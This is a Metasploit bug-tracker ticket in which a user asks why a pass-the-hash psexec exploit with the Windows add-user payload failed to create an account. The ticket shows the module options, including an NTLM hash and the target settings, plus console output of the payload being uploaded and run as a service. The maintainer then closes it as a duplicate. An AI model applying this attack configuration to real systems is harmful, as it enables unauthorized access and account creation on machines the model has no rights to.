Bug #2482

Microsoft Windows Authenticated User Code Execution with Windows Add User Payload

Added by john grisham over 1 year ago. Updated over 1 year ago.

Status:Closed Start date:09/01/2010
Priority:Normal Due date:
Assignee:Joshua J. Drake % Done:

0%

Category:payloads
Target version:-
Resolution:duplicate Release Note:

Description

Hi,

I was trying the above exploit using a NTLM hash to exploit and then deploying windows adduser payload
Connection (445) was established between the attacking machine and the target machine.
However, the account was not created on the target machine. Is this exploit limited to the kinds of payload we can deploy?

Note: I have physical access to both machine, and on the targetted machine, the account was not created although a 445 session was established between the attacking and target machine.


Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.10 yes The target address
RPORT 445 yes Set the SMB service port
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass 00000000000000000000000000000000:E3D386D6673369E87139D020D653218E no The password for the specified username
SMBUser Administrator no The username to authenticate as

Payload options (windows/adduser):

Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   PASS      test123          yes       The password for this user
   USER      test123          yes       The username to create

[*] Connecting to the server...
[*] Authenticating as user 'ADministrator'...
[*] Uploading payload...
[*] Created \DkysLinS.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (hjTkQCQp - "MrsMgvquMqVIwuWWTZLIAlXkQPCB")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \DkysLinS.exe...
[*] Exploit completed, but no session was created.


Related issues

duplicates Metasploit Framework - Bug #2474: Microsoft Windows Authenticated User Code Execution with ... Closed 09/01/2010

History

Updated by Joshua J. Drake over 1 year ago

  • Category changed from modules - exploits to payloads
  • Status changed from New to Closed
  • Resolution set to duplicate

Closing as duplicate.

Also available in: Atom PDF